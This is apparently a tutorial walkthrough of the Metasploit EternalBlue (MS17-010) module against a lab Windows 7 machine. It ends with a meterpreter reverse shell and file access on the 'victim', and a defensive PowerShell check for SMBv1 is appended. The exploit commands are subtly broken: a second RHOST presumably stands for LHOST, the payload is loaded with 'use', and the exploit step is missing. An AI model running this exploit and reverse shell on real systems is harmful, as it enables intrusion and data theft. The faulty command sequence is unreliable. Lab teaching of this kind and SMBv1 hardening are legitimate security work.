EternalBlue is an exploit supposedly developed by the NSA. It was leaked by the hacker group “Shadow Brokers” on April 14, 2017, and was used in the widespread WannaCry ransomware attack on May 12, 2017.
Name of the module
exploit/windows/smb/ms17_010_eternalblue
Sean Dillon <sean.dillon [at] risksense.com>
Dylan Davis <dylan.davis [at] risksense.com>
Equation Group
Windows 7 and Server 2008 R2 (x64) All Service Packs
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show targets
...targets...
msf exploit(ms17_010_eternalblue) > set TARGET <target-id>
msf exploit(ms17_010_eternalblue) > show options
...show and set options...
msf exploit(ms17_010_eternalblue) > exploit
We will walk through a simple example so you can see the scope of this module.
The requirements are the following:
- Windows 7 virtual machine
- Ubuntu Linux virtual machine
As a first step, we make sure that both machines are connected to the same network, that is, that the Linux machine can ping the Windows 7 machine.
EternalBlue is an exploit that targets a vulnerability in Microsoft SMB v1.0. It is now commonly used in malware to help it spread across a network. Some malicious programs that have used it are WannaCry, Trickbot, WannaMine and many others. Machines that are not patched against this vulnerability are at high risk of attack.
Let’s start playing with this.
We open an Ubuntu terminal and type the following.
$ msfconsole -q
> use exploit/windows/smb/ms17_010_eternalblue
> set RHOST 192.168.248.3
> use payload/windows/x64/meterpreter/reverse_tcp
> set RHOST 192.168.248.4
meterpreter > shell
As a final result, we have a shell on our victim machine and, besides that, we can look for any files we want.
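On the defensive side, the SMB v1.0 exposure described above can be checked on the Windows 7 machine itself. The following PowerShell is an added example, not part of the original post or of the Metasploit module; the function names Get-Smb1ServerState and Disable-Smb1Server are hypothetical, and it assumes an elevated prompt on Windows 7 or Server 2008 R2.

```powershell
# Added example: audit the SMBv1 server setting on Windows 7 / Server 2008 R2.
# Function names are hypothetical; run from an elevated PowerShell prompt.
$ParamsKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-Smb1ServerState {
    # On these Windows versions SMBv1 is on by default and the SMB1 value is
    # normally absent, so a missing value must be reported as enabled.
    $props = Get-ItemProperty -Path $ParamsKey -ErrorAction Stop
    $value = $props.SMB1
    if ($null -eq $value) { return 'Enabled (default, no SMB1 value set)' }
    if ($value -eq 0)     { return 'Disabled' }
    return "Enabled (SMB1 = $value)"
}

function Disable-Smb1Server {
    # Creates or overwrites the SMB1 DWORD with 0. The Server service reads it
    # at start-up, so the change takes effect after a restart.
    Set-ItemProperty -Path $ParamsKey -Name SMB1 -Type DWord -Value 0 -Force
}

"SMBv1 server: $(Get-Smb1ServerState)"
# Disable-Smb1Server   # uncomment to apply, then restart the machine
```

Turning off SMBv1 reduces exposure but does not replace installing the MS17-010 security update on the machine.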